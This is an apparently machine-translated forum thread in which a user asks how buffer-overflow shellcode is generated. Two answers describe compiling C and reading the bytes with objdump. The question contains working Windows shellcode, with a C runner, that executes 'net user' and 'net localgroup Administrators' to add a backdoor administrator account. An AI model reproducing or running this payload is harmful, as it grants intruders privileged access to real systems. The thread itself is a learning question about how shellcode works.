缓冲区溢出的shell代码是如何产生的

Question

下面的代码引起了我的好奇心。我总是寻找，搜索和研究所谓的“缓冲区溢出”漏洞。我想知道代码是如何生成的。代码运行的方式和原因？

char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" 
     "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" 
     "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" 
     "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a" 
     "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf" 
     "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f" 
     "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69" 
     "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63" 
     "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44" 
     "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33" 
     "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65" 
     "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63" 
     "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"; 


int main(int argc, char **argv){ 
int (*f)(); 
f = (int (*)())shellcode;(int)(*f)(); 
} 

非常感谢fella's。^_^

Answer 1

的简单方法来产生这样的代码是写在C.所期望的功能。然后对其进行编译（没有链接），这将产生一个目标文件的shellcode .o。现在你可以看到使用objdump的汇编代码

odjdump -D shellcode.o 

现在你可以看到与你的函数中的指令对应的字节。 请记住，只有当你的shellcode没有调用任何其他函数，或者没有引用任何全局变量或字符串时，这才会起作用。这是因为链接器尚未被调用。如果你想要所有的功能，我会建议你在导出所需的功能时生成一个共享的二进制文件（在Windows上的* .NIX和dll上）。然后你可以找到函数的起始点并从那里复制字节。您还必须复制所有其他函数和全局变量的字节。您还必须确保将共享库编译为位置独立库。

同样如上所述，此代码生成的目标是特定的，不会像其他平台上那样工作。

Answer 2

机器代码指令已作为数据直接输入到C程序中，然后用函数指针调用。如果系统允许，程序集可以采取任何允许该程序的操作，包括启动其他程序。

该代码特定于它所针对的特定处理器。使用说gcc作为编译器作为

gcc -c shellcode.c